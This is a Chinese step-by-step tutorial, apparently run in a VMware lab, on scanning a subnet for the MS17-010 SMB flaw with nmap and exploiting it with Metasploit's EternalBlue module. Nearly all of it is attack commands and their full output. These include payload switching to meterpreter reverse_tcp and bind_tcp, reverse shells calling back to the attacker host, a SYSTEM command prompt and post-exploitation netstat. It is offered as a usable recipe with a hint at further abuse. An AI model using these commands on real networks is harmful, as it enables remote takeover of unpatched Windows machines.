使用Nmap扫描ms17-010

使用Nmap探测内网192.168.119.1C段下那些主机开放了445端口已经存在ms17-010漏洞

nmap -p445 –script smb-vuln-ms17-010 192.168.1.1/24

由于我的内网IP192.168.119.136,所以就用这条命令:

图片

nmap -p445 –script smb-vuln-ms17-010 192.168.1.1/24

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds

图片

从上图可以看出,在内网中192.168.119.139这台主机存在ms-17-010漏洞!

exploit利用ms17-010

直接上命令:

1
2
use exploit/windows/smb/ms17_010_eternalblue

图片

设置好目标IP,然后run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

图片

利用永恒之蓝成功!但返回的只是一个cmdshell

因为msf默认用的paylaod是:payload/windows/x64/shell/reverse_tcp

我们可以设置成其他payload:

1
set payload windows/x64/meterpreter/reverse_tcp

设置好了show options看需要设置的参数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.119.139 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.119.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

一般来说只要设置rhostsrport就OK了,其他的msf会自动帮你设置!

最后exploit运行看看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.139
[*] Meterpreter session 5 opened (192.168.119.136:4444 -> 192.168.119.139:49211) at 2019-10-10 21:24:40 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

可以看到,这个时候就反弹的就是一个meterpreter会话,具体有哪些功能呵呵,你懂得~

使用正向的payload也是可以的

set payload windows/x64/meterpreter/bind_tcp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
meterpreter > netstat -ano

Connection list
===============

Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 712/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:5357 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 396/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 764/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 928/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 496/services.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 2028/svchost.exe
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 504/lsass.exe
tcp 192.168.119.139:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 192.168.119.139:4444 192.168.119.136:45747 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49159 192.168.119.136:4444 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49187 118.112.253.1:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49188 63.147.242.144:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49189 51.143.111.81:80 SYN_SENT 0 0 648/wermgr.exe
tcp6 :::135 :::* LISTEN 0 0 712/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
tcp6 :::5357 :::* LISTEN 0 0 4/System
tcp6 :::49152 :::* LISTEN 0 0 396/wininit.exe
tcp6 :::49153 :::* LISTEN 0 0 764/svchost.exe
tcp6 :::49154 :::* LISTEN 0 0 928/svchost.exe
tcp6 :::49155 :::* LISTEN 0 0 496/services.exe
tcp6 :::49156 :::* LISTEN 0 0 2028/svchost.exe
tcp6 :::49157 :::* LISTEN 0 0 504/lsass.exe
udp 0.0.0.0:500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:4500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:5355 0.0.0.0:* 0 0 984/svchost.exe
udp 0.0.0.0:61604 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:65412 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:137 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:138 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:65411 0.0.0.0:* 0 0 1576/svchost.exe
udp6 :::500 :::* 0 0 928/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::4500 :::* 0 0 928/svchost.exe
udp6 :::5355 :::* 0 0 984/svchost.exe
udp6 :::61605 :::* 0 0 1576/svchost.exe
udp6 ::1:1900 :::* 0 0 1576/svchost.exe
udp6 ::1:65410 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:1900 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:65409 :::* 0 0 1576/svchost.exe

meterpreter >

查看端口监听情况可以看到:

192.168.119.139:4444192.168.119.136:45747进行连接,注入进程是:spoolsv.exe